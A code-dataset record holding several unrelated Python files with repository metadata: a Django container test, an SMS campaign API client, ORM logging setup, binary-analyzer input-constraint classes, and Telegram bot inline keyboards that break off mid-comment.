tests/test_myapp/test_dependencies_container.py
|
BasicWolf/hexagonal-architecture-django
|
3bfa4ea2f258ba038c6e3cf73bcdae0511b6fcb6
|
[
"MIT"
] | 6
|
2021-06-07T08:26:24.000Z
|
2022-02-28T11:06:49.000Z
|
from myapp.dependencies_container import build_production_dependencies_container
def test_build_production_ioc_container():
build_production_dependencies_container()
| 28.666667
| 80
| 0.889535
| 19
| 172
| 7.473684
| 0.526316
| 0.443662
| 0.380282
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075581
| 172
| 5
| 81
| 34.4
| 0.893082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
e8adcf4424a85e0f2dd1d251e004f64638689e3a
| 46
|
py
|
Python
|
test.py
|
bichanna/coolPrint
|
44df057fdf4349fcc8346da250841b78758cb995
|
[
"MIT"
] | 3
|
2021-08-31T18:03:24.000Z
|
2021-11-15T11:54:30.000Z
|
test.py
|
bichanna/coolprint
|
44df057fdf4349fcc8346da250841b78758cb995
|
[
"MIT"
] | null | null | null |
test.py
|
bichanna/coolprint
|
44df057fdf4349fcc8346da250841b78758cb995
|
[
"MIT"
] | null | null | null |
import coolprint
coolprint.coolprint("Hello")
| 15.333333
| 28
| 0.826087
| 5
| 46
| 7.6
| 0.6
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 3
| 28
| 15.333333
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
e8b533c16757d9c155bac848ab273c2cf77549ec
| 5,059
|
py
|
Python
|
pytermii/campaign.py
|
Adeshinadev/pytermii
|
29d38eeb1da03885ffab13738b3729f95038311d
|
[
"MIT"
] | 1
|
2022-03-17T10:51:07.000Z
|
2022-03-17T10:51:07.000Z
|
pytermii/campaign.py
|
Adeshinadev/pytermii
|
29d38eeb1da03885ffab13738b3729f95038311d
|
[
"MIT"
] | null | null | null |
pytermii/campaign.py
|
Adeshinadev/pytermii
|
29d38eeb1da03885ffab13738b3729f95038311d
|
[
"MIT"
] | null | null | null |
import json
import requests
from pytermii.phonebook import Phonebook
base_url = 'https://api.ng.termii.com/api'
class Campaign:
def __init__(self, api_key):
self.api_key = api_key
def send_campaign_by_name(self, phonebook_name, country_code, sender_id, message, channel, message_type,
campaign_type,
schedule_sms_status=None, schedule_time=None):
phonebooks = Phonebook(self.api_key)
all_phonebooks = phonebooks.fetch()
phonebook_id = 'id'
if phonebook_name:
for i in all_phonebooks['data']:
if i['name'] == phonebook_name:
phonebook_id = i['id']
else:
pass
if schedule_time and schedule_sms_status:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
"schedule_time": schedule_time,
"schedule_sms_status": schedule_sms_status
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
else:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
else:
message = {'message': 'please provide a value for phonebook_name'}
return json.dumps(message)
def send_campaign_by_id(self, phonebook_id, country_code, sender_id, message, channel, message_type,
campaign_type,
schedule_sms_status=None, schedule_time=None):
if schedule_time and schedule_sms_status:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
"schedule_time": schedule_time,
"schedule_sms_status": schedule_sms_status
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
else:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
def fetch_campaign(self):
url = base_url + f'/sms/campaigns?api_key={self.api_key}'
response = requests.get(url)
print(response.json())
return response.json()
def fetch_campaigns(self):
url = base_url + f'/sms/campaigns?api_key={self.api_key}'
response = requests.get(url)
print(response.json())
return response.json()
def fetch_campaign_history(self, campaign_id):
url = base_url + f'/sms/campaigns/{campaign_id}?api_key={self.api_key}'
response = requests.get(url)
print(response.json())
return response.json()
| 37.198529
| 108
| 0.504645
| 469
| 5,059
| 5.172708
| 0.140725
| 0.044518
| 0.04122
| 0.042869
| 0.813685
| 0.80709
| 0.787716
| 0.787716
| 0.787716
| 0.787716
| 0
| 0
| 0.396521
| 5,059
| 135
| 109
| 37.474074
| 0.794628
| 0
| 0
| 0.741667
| 0
| 0
| 0.177611
| 0.024723
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0.008333
| 0.025
| 0
| 0.15
| 0.025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8b572d3a5593251770ed37593be08db716c8c57
| 176
|
py
|
Python
|
scierror/__init__.py
|
segFault15/PyError
|
95a87dd8a885cbcc814a4ebad39b507788947141
|
[
"MIT"
] | 2
|
2021-05-01T01:44:17.000Z
|
2021-05-10T12:20:14.000Z
|
scierror/__init__.py
|
segFault15/PyError
|
95a87dd8a885cbcc814a4ebad39b507788947141
|
[
"MIT"
] | 3
|
2020-09-23T11:27:29.000Z
|
2021-05-05T01:07:55.000Z
|
scierror/__init__.py
|
segFault15/scierror
|
95a87dd8a885cbcc814a4ebad39b507788947141
|
[
"MIT"
] | null | null | null |
from scierror.main import Measurement
from scierror.main import LinearRegression
from scierror.main import DataFile
from scierror.main import latex_table
__version__ = '0.0.3'
| 29.333333
| 42
| 0.840909
| 25
| 176
| 5.72
| 0.48
| 0.335664
| 0.447552
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019108
| 0.107955
| 176
| 6
| 43
| 29.333333
| 0.89172
| 0
| 0
| 0
| 0
| 0
| 0.028249
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fa2e302b4508900667e3acb9899bfa8921b28412
| 114
|
py
|
Python
|
tortoise/log.py
|
blazing-gig/tortoise-orm
|
811bbcb12c702c5f45e3d86ce6e0b2ab386459df
|
[
"Apache-2.0"
] | 2,847
|
2018-08-27T12:02:21.000Z
|
2022-03-31T01:30:40.000Z
|
tortoise/log.py
|
blazing-gig/tortoise-orm
|
811bbcb12c702c5f45e3d86ce6e0b2ab386459df
|
[
"Apache-2.0"
] | 983
|
2018-08-24T16:42:41.000Z
|
2022-03-30T05:14:49.000Z
|
tortoise/log.py
|
blazing-gig/tortoise-orm
|
811bbcb12c702c5f45e3d86ce6e0b2ab386459df
|
[
"Apache-2.0"
] | 323
|
2018-09-04T23:38:42.000Z
|
2022-03-31T06:49:17.000Z
|
import logging
logger = logging.getLogger("tortoise")
db_client_logger = logging.getLogger("tortoise.db_client")
| 22.8
| 58
| 0.807018
| 14
| 114
| 6.357143
| 0.5
| 0.292135
| 0.494382
| 0.674157
| 0.853933
| 0.853933
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 114
| 4
| 59
| 28.5
| 0.847619
| 0
| 0
| 0
| 0
| 0
| 0.22807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
3af93b3bf0d738c0d08924627a59aaf80cd653e5
| 9,519
|
py
|
Python
|
chb/invariants/InputConstraint.py
|
kestreltechnology/CodeHawk-Binary
|
aa0b2534e0318e5fb3770ec7b4d78feb0feb2394
|
[
"MIT"
] | null | null | null |
chb/invariants/InputConstraint.py
|
kestreltechnology/CodeHawk-Binary
|
aa0b2534e0318e5fb3770ec7b4d78feb0feb2394
|
[
"MIT"
] | null | null | null |
chb/invariants/InputConstraint.py
|
kestreltechnology/CodeHawk-Binary
|
aa0b2534e0318e5fb3770ec7b4d78feb0feb2394
|
[
"MIT"
] | null | null | null |
# ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
# Copyright (c) 2020 Henny Sipma
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from abc import ABC, abstractmethod
from typing import Optional, TYPE_CHECKING
import chb.invariants.InputConstraintValue as ICV
import chb.util.fileutil as UF
if TYPE_CHECKING:
import chb.invariants.XXpr
class InputConstraint(ABC):
def __init__(self) -> None:
pass
def is_env_test(self) -> bool:
return False
def is_env_absent(self) -> bool:
return False
def is_string_starts_with(self) -> bool:
return False
def is_string_not_starts_with(self) -> bool:
return False
def is_string_equals(self) -> bool:
return False
def is_string_not_equals(self) -> bool:
return False
def is_string_contains(self) -> bool:
return False
def is_string_not_contains(self) -> bool:
return False
@property
@abstractmethod
def stringexpr(self) -> ICV.InputConstraintValue:
...
class EnvironmentTestConstraint(InputConstraint):
def __init__(self, name: str):
InputConstraint.__init__(self)
self._name = name
@property
def name(self) -> str:
return self._name
@property
def stringexpr(self) -> ICV.InputConstraintValue:
raise UF.CHBError("Environment constraint has not stringexpr")
def is_env_test(self) -> bool:
return True
def __str__(self) -> str:
return "env(" + self.name + ")"
class EnvironmentAbsentConstraint(InputConstraint):
def __init__(self, name: str):
InputConstraint.__init__(self)
self._name = name
@property
def name(self) -> str:
return self._name
@property
def stringexpr(self) -> ICV.InputConstraintValue:
raise UF.CHBError("Environment constraint has not stringexpr")
def is_env_absent(self) -> bool:
return True
def __str__(self) -> str:
return "!env(" + self.name + ")"
class StringEqualsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
def is_string_equals(self) -> bool:
return True
def __str__(self) -> str:
predicate = "equalsIgnoreCase" if self.case_insensitive else "equals"
return (predicate
+ "("
+ str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
class StringNotEqualsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
def is_string_not_equals(self) -> bool:
return True
def __str__(self) -> str:
predicate = "equalsIgnoreCase" if self.case_insensitive else "equals"
return ("!"
+ predicate
+ "("
+ str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
class StringStartsWithConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
length: Optional[int] = None,
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self._length = length
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
@property
def length(self) -> int:
if self._length is not None:
return self._length
else:
raise UF.CHBError("String constraint has no length: "
+ str(self))
def has_length(self) -> bool:
return self._length is not None
def is_string_starts_with(self) -> bool:
return True
def __str__(self) -> str:
predicate = "startswithIgnoreCase" if self.case_insensitive else "startswith"
return (predicate
+ '(' +
str(self.stringexpr)
+ ','
+ str(self.stringconst)
+ ')')
class StringNotStartsWithConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
length: Optional[int] = None,
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self._length = length
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
@property
def length(self) -> int:
if self._length is not None:
return self._length
else:
raise UF.CHBError("String constraint has no length: "
+ str(self))
def has_length(self) -> bool:
return self._length is not None
def is_string_not_starts_with(self) -> bool:
return True
def __str__(self) -> str:
predicate = "startswithIgnoreCase" if self.case_insensitive else "startswith"
return ("!"
+ predicate
+ "(" +
str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
class StringContainsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: str) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> str:
return self._stringconst
def is_string_contains(self) -> bool:
return True
def __str__(self) -> str:
return ("contains("
+ str(self.stringexpr)
+ ','
+ self.stringconst
+ ')')
class StringNotContainsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: str) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> str:
return self._stringconst
def is_string_not_contains(self) -> bool:
return True
def __str__(self) -> str:
return ("!contains("
+ str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
| 28.5
| 85
| 0.602794
| 939
| 9,519
| 5.899894
| 0.179979
| 0.06065
| 0.045487
| 0.032491
| 0.752347
| 0.733032
| 0.728881
| 0.714982
| 0.688448
| 0.672924
| 0
| 0.002364
| 0.288896
| 9,519
| 333
| 86
| 28.585586
| 0.816073
| 0.151907
| 0
| 0.886463
| 0
| 0
| 0.061164
| 0.023869
| 0
| 0
| 0
| 0
| 0
| 1
| 0.235808
| false
| 0.004367
| 0.021834
| 0.157205
| 0.480349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d75715918a5e94bb00fed3635dd9586199908ef3
| 23,487
|
py
|
Python
|
app/keyboards/inline/add_product_photo.py
|
Katel212/MyPersonalKitchenBot
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
[
"MIT"
] | null | null | null |
app/keyboards/inline/add_product_photo.py
|
Katel212/MyPersonalKitchenBot
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
[
"MIT"
] | 5
|
2020-12-22T17:53:05.000Z
|
2021-04-07T20:00:47.000Z
|
app/keyboards/inline/add_product_photo.py
|
Katel212/MyPersonalKitchenBot
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
[
"MIT"
] | null | null | null |
from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton, inline_keyboard
class AddProductPhotoErrorFridge(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'fridge\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoGoodFridge(InlineKeyboardMarkup):
@staticmethod
def create(foods: list):
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную',
callback_data=f'add_product_typing_[\'fridge\']')
inline_kb_full = InlineKeyboardMarkup(row_width=1)
if len(foods) == 1:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
inline_kb_full.add(product_one)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 2:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
inline_kb_full.add(product_one, product_two)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) >= 3:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
inline_kb_full.add(product_one, product_two, product_three)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
class AddProductPhotoErrorShoppingList(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'shopping_list\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'shopping_list\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoGoodShoppingList(InlineKeyboardMarkup):
@staticmethod
def create(foods: list):
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'shopping_list\']')
add_typing_button = InlineKeyboardButton('Ввести вручную',
callback_data=f'add_product_typing_[\'shopping_list\']')
inline_kb_full = InlineKeyboardMarkup(row_width=1)
if len(foods) == 1:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
inline_kb_full.add(product_one)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 2:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
inline_kb_full.add(product_one, product_two)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) >= 3:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
inline_kb_full.add(product_one, product_two, product_three)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
class AddProductPhotoCheckErrorFridge(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_check_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'fridge\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoCheckErrorShoplist(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_check_[\'shopping_list\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'shopping_list\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoCheckGoodFridge(InlineKeyboardMarkup):
@staticmethod
def create(foods: list):
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_check_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную',
callback_data=f'add_product_typing_[\'fridge\']')
inline_kb_full = InlineKeyboardMarkup(row_width=1)
if len(foods) == 1:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
inline_kb_full.add(product_one)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 2:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
inline_kb_full.add(product_one, product_two)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 3:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
inline_kb_full.add(product_one, product_two, product_three)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 4:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 5:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.add(product_five)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 6:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[5]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 7:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[5]}')
product_seven = InlineKeyboardButton(foods[6],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[6]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.add(product_seven)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) >= 8:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[5]}')
product_seven = InlineKeyboardButton(foods[6],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[6]}')
product_eight = InlineKeyboardButton(foods[7],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[7]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.row(product_seven, product_eight)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
class AddProductPhotoCheckGoodShoplist(InlineKeyboardMarkup):
    """Inline keyboard confirming product names recognized on a photo,
    targeting the shopping list.

    Each recognized name becomes a button whose callback adds that product
    to the shopping list; a 'retry' and a 'type manually' button are always
    appended as the last row.
    """

    @staticmethod
    def create(foods: list):
        """Build the keyboard for up to eight recognized product names.

        Args:
            foods: recognized product names; only the first 8 are used.

        Returns:
            InlineKeyboardMarkup, or None when ``foods`` is empty
            (preserves the original fall-through behaviour).
        """
        reset_button = InlineKeyboardButton(
            'Повторить',
            callback_data="add_product_photo_check_['shopping_list']")
        add_typing_button = InlineKeyboardButton(
            'Ввести вручную',
            callback_data="add_product_typing_['shopping_list']")
        # Original code had no branch for an empty list and implicitly
